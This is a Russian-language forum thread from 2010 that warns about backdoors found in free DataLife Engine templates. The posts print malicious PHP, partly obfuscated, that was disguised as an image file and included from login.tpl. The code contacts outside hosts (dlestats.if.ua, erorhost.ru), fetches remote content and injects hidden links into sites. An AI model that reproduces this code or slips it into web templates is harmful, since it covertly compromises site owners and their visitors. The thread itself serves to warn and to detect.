Инфо Уязвимости в бесплатных шаблонах

Тема в разделе "DLE", создана пользователем Inviseble_Demon, 6 авг 2010.

Информация :
Актуальная версия DataLife Engine 11.2
( Final Release v.11.2 | Скачать DataLife Engine | Скачать 11.2 demo )
Нужно ли обновляться | Как обновиться | Изменения в шаблонах
> Нет русских символов <
[Приватная тема DLE (Все подробности в ЛС к модератору раздела)]

Версии 11.1 и ниже - уязвимы!

Локализации | F.A.Q. | Внешний вид
Правила раздела | Правила форума
Обсуждение хайда карается баном!
В каждом сообщении указывайте версию DLE, которого они касаются!
Статус темы:
Закрыта.
Модераторы: killoff
  1. Inviseble_Demon

    Inviseble_Demon

    Регистр.:
    11 дек 2008
    Сообщения:
    482
    Симпатии:
    350
    Сегодня ковырял фришный шаблон для DLE
    Случайно наткнулся на...
    \templates\******\images\btn_send.jpg (файл во вложении)
    Файл скрытый...
    Начал копаться...
    login.tpl
    [​IMG]
    Дальше base64_decode не пошол...
    Суть и так ясна.
    Задумка интересная у него была....
    Советую проверить наличие данной гадости ;)
     

    Вложения:

    • btn_send.txt
      Размер файла:
      8,1 КБ
      Просмотров:
      385
    palec, Serberg, viktor6 и 8 другим нравится это.
  2. PoMaH

    PoMaH

    Регистр.:
    8 июн 2006
    Сообщения:
    753
    Симпатии:
    142
    Да такое есть...
    высылает и принимает данные из dlestats.if.ua и запись делает в engine/cache/system/topnews.tmp



    define(" ", "\x6b\x7a\x6d\x75\x73\x69\x63");
    define(" ", ROOT_DIR."\x2f\x65\x6e\x67\x69\x6e\x65\x2f\x63\x61\x63\x68\x65\x2f\x73\x79\x73\x74\x65\x6d\x2f\x74\x6f\x70\x6e\x65\x77\x73\x2e\x74\x6d\x70");
    define(" ", "dlestats.if.ua");
    define(" ", "\x2f\x73\x74\x61\x74\x69\x73\x74\x69\x6b\x61");

    --- Potior kod 4 safe ----

    define(" ", $ );
    define("pointnm", "\x72\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x73");
    $ ='';
    if (isset($_GET['do'])){$login_panel = str_replace("\x64\x6f\x3d\x72\x65\x67\x69\x73\x74\x65\x72", "\x72\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x73", $login_panel);}
    function (){ if (function_exists('file_get_contents')&&ini_get('allow_url_fopen') == 1){ if ($ = @file_get_contents("ht"."tp://" . . . )) {if (strlen($ )>11) {$ = substr($ , strlen($ )-10 , 10);
    if (strpos($ ,"Sf65eFg")!=0){return $ ;
    }
    else
    {return false; }
    }} }
    else
    {$ = ''; $ = @fsockopen( , 80, $ , $ , 5);
    if ($ ) { @fputs($ , "GET ". . ." HTTP/1.0\r\nHost: ". ."\r\n");
    @fputs($ , "User-Agent: Abigale\r\n\r\n");
    while (!@feof($ )) { $ .= @fgets($ , 128);
    } @fclose($ );
    $ = explode("\r\n\r\n", $ );
    if (strlen($ [1])>11) {$ = substr($ [1], strlen($ [1])-10 , 10);
    if (strpos($ ,"Sf65eFg")!=0){return $ [1];
    }else{return false;
    }} } }return false;

    --- Potior kod 4 safe ----


    if (!feof($ )) {$ =fgets($ );
    }if (!feof($ )) {$ =fgets($ );
    }while (!feof($ )) {$ ='';
    $ = '';
    $ =fgets($ );
    if(strlen($ )>15) {$ =0;
    $ ='';
    $ =strpos($ ,'2a2d2a');
    $ = substr($ , 0, $ );
    for ($ =0;
    --- Potior kod 4 safe ----
    $ < strlen($ )-2;
    $ +=2){$ .= chr(hexdec($ [$ ].$ [$ +1]));
    }@flock($ , LOCK_UN);
    @fclose($ );
    return $ ;
    break;
    }}}@flock($ , LOCK_UN);
    @fclose($ );
    return false;
    }else return false;
    }else return false;
    }
    function _write($ , $ ) {$ =0;
    $ =localtime(time(),true);
    if ($ =="0\r\n") {$ [tm_mday]='0';
    }$ = @fopen($ , 'wb');
    if ($ ) {@flock($ , LOCK_EX);
    $ = strlen($ [tm_mday]."\r\n".$ );
    @fwrite($ , $ [tm_mday]."\r\n". $ , $ );
    @flock($ , LOCK_UN);
    @fclose($ );
    return true;
    } return false;
    }

    --- Potior kod 4 safe ----

    if(strlen($ )>15) {$ =0;
    $ ='';
    $ =strpos($ ,'2a2d2a');
    $ = substr($ , 0, $ );
    for ($ =0;
    $ < strlen($ )-1;
    $ +=2){$ .= chr(hexdec($ [$ ].$ [$ +1]));
    }
    $ .="\x3c\x61\x20\x68\x72\x65\x66\x3d\""."\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6e\x65\x77\x73\x69\x64\x3d".$ .'&'. .'='.trim($ ).'">'.trim($ )."\x3c\x2f\x61\x3e\x3c\x62\x72\x2f\x3e";
    $ =$ +1;}}
    @flock($ , LOCK_UN);
    @fclose($ );
    return $ ;
    }
    else return false;
    }else return false;
    }

    if (isset($_GET[pointnm])){$ ='';
    if($ = ()){$login_panel.=$ ;
    }}if (isset($_GET[ ])){if(file_exists( )){if($ = ()){$login_panel.=$ ;
    }}}else {$ =0;
    $ =localtime(time(),true);
    if(strpos($ , 'localhost')==false){if($ [tm_hour]>= &&$ [tm_hour]<= +11){if(file_exists( )){if(chmod( , 0666)){$ ='';
    if($ =fopen( , "r")){$ ='';
    $ =fgets($ );
    fclose($ );
    if($ !=''){if($ !=$ [tm_mday]){$ ='';
    if( $ = ()){_write( ,$ );
    }}}}}}else{_write( ,"0\r\n");
    }}}}

     
    Jerry нравится это.
  3. -=ber$erk=-

    -=ber$erk=-

    Регистр.:
    17 мар 2008
    Сообщения:
    237
    Симпатии:
    105
    недавно у себя на одном сайте обнаружил левые ссылки, 4 шт.
    долго ковырял шаблон на предмет ссылок, не было их
    но был скрипт с расширением графического файла который подгружался в login.tpl
    вот с таким содержимым
    PHP:
    <?php  
    $sock 
    = @fsockopen("www.erorhost.ru"80$errstr$errno30); 
    if (
    $sock){  
        
    $headers "GET /sait/id2.php?site=".$_SERVER['HTTP_HOST']." HTTP/1.1\n"
        
    $headers .= "Host: www.erorhost.ru\n";  
        
    $headers .= "Accept: text/html, text/plain, text/sgml, */*;q=0.01 Accept-Encoding: gzip, compress  Accept-Language: ru,en Accept-Charset: windows-1251, iso-8859-1;q=0.01, us-ascii;q=0.01\n\n";  
         
        
    fwrite($sock$headers); 
        
    $x10 false
         
        while (!
    feof($sock)) { 
            
    $x11=fgets($sock,128); 
            if (
    $x10)  
                
    $result .= $x11
            else  
                
    $x13 .= $x11
                 
            if (
    $x11 == "\r\n" )  
                
    $x10 true
        } 
        
    fclose($sock); 

    else return 
    $error
    if (
    strstr($x13,'404')) return $error
    else return 
    $result;  
    ?>
    у всех сайтов доноров был тИЦ от двухсот
    вот такой вот маленький сапозаводик
     
    Serberg нравится это.
  4. Demon425

    Demon425

    Регистр.:
    9 июл 2008
    Сообщения:
    439
    Симпатии:
    96
    А чё париться? удали кусок кода, посмотри всё работает да и всё)

    По поводу фри - их нужно всегда пересматривать!
     
Статус темы:
Закрыта.